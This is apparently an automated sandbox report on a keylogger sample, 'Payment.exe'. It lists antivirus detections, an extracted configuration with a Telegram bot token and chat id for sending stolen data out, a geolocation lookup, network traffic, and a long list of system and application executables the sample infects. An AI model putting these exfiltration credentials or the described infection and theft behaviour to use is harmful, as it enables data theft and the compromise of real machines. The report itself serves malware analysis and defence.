Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat id": "7941708421"}
Source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y", "Chat_id": "7941708421", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Payment.exe	Virustotal: Detection: 41%			Perma Link
Source: Payment.exe	ReversingLabs: Detection: 47%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.3%

Sample uses string decryption to hide its real strings

Source: 8.2.Payment.exe.3c40000.3.raw.unpack	String decryptor: 7222288618:AAHmjWFpZ08g76_6xr4NgmiN7PynC_nQC7Y
Source: 8.2.Payment.exe.3c40000.3.raw.unpack	String decryptor: 7941708421
Source: 8.2.Payment.exe.3c40000.3.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_02E48286 CryptStringToBinaryA,CryptStringToBinaryA,GetTokenInformation,GetTokenInformation,GetLastError,OpenProcessToken,CloseHandle,GetSidSubAuthorityCount,

8_2_02E48286

Source: Payment.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49685 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49724 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49753 version: TLS 1.2

Source: Payment.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vssvc.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, Payment.exe, 00000008.00000002.2146723496.0000000003898000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001212000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vcVJ.pdb source: Payment.exe
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
Source:	Binary string: locator.pdb source: Locator.exe.8.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wbengine.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ifsutil.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: notification_helper.exe.pdb source: notification_helper.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: udfs.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
Source:	Binary string: uudf.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vcVJ.pdbSHA256& source: Payment.exe
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: Locator.exe.8.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: default-browser-agent.pdb source: default-browser-agent.exe.8.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.8.dr
Source:	Binary string: vssapi.pdb source: WBEngine.0.etl.34.dr
Source:	Binary string: spp.pdb source: WBEngine.0.etl.34.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\SgrmBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_02E4DF57 FindFirstFileW,

8_2_02E4DF57

Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_052E8F29
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0748D4DFh	0_2_0748CF29
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 0748D4DFh	0_2_0748CF69
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 03ADFB20h	8_2_03ADFB6F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 03ADFB20h	8_2_03ADF980
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A8320h	8_2_070A7FE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A9AEBh	8_2_070A9818
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A25ACh	8_2_070A2300
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AB1E3h	8_2_070AAF10
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AD20Bh	8_2_070ACF38
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A55DCh	8_2_070A5330
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A79DCh	8_2_070A7730
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A2A04h	8_2_070A2758
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AF233h	8_2_070AEF60
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A5A34h	8_2_070A5788
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A7E34h	8_2_070A7B88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070AB67Bh	8_2_070AB3A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 4x nop then jmp 070A2E5Ch	8_2_070A2BB0
